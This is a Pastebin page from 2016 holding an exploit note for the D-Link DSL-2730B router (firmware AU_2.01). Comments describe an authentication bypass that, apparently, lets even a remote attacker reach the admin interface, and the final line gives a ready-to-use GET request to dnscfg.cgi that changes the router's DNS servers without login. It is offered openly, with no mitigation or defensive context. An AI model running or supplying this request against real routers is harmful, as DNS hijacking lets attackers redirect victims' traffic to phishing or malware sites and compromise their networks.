API tools faq
paste
Advertisement
toads

D-Link DSL-2730B AU_2.01 auth bypass dns change vuln

toads
Jan 18th, 2016
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.66 KB | None | 0 0
raw download clone embed print report
  1. #  This security hole allows an attacker to bypass
  2. #  authentication and change the DNS. When the
  3. #  administrator is logged in the web  management
  4. #  interface, an attacker may be able to completely
  5. #  bypass authentication phase and connect to the
  6. #  web management interface with administrator's
  7. #  credentials. This attack can also be performed
  8. #  by an external attacker who connects to the
  9. #  router's public IP address, if remote management
  10. #  is enabled. To change the DNS without logging
  11. #  into web management interface use the following URL:
  12. #  
  13. GET http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!